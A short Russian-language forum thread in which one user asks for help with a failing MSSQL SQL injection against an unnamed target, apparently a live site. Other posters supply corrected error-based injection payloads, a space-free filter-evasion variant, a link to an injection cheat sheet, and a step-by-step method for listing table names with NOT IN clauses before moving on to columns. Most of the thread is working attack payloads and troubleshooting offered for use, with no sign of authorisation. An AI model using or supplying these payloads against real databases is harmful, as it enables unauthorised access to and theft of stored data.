|
mssql inj help
При таком запросе
"1+or+1=(SELECT+1+TOP+TABLE_NAME+FROM+INFORMATION_ SCHEMA.TABLES)--" показывает Incorrect syntax near the keyword 'TOP' в чем моя ошибка? |
юзай
http://pentestmonkey.net/blog/mssql-sql-injection-cheat-sheet/ |
"1+or+1=(SELECT+1+max(TABLE_NAME)+FROM+INFORMATION _SCHEMA.TABLES)--"
|
можно проинжектить запрос вобще без использования пробелов:
or(1=(select(max(table_name))from[information_schema].tables)) [ cash ] ;) |
спасиб онотолий, помогло
|
снова я
1+or+1=((select((table_name))from[information_schema].tables+where+TABLE_NAME+NOT+IN+('syssegments')))-- выводит 'syssegments' делаю так 1+or+1=((select((table_name))from[information_schema].tables+where+TABLE_NAME+NOT+IN+('syssegments','sy ssegments')))-- выводит 'syssegmentssyssegments' в след запросе выводит уже 'syssegmentssyssegmentssyssegmentssyssegments' и т.д. |
TABLE_NAME+NOT+IN+('syssegments','sy ssegments','syssegmentssyssegments'...итд)))--
таким образом узнаёш все таблицы)) патом также только для столбцов и формеруеш запрос к бд)) |
я знаю что так надо
просто проблема в том что он просто делат так syssegments syssegmentssyssegments syssegmentssyssegmentssyssegmentssyssegments syssegmentssyssegmentssyssegmentssyssegmentssysseg mentssyssegments ... так не должно быть |
-=megahertz=-, покажи полностью, результат выполнения запроса
|
разграничь при помощи ';'
|
| Время: 15:48 |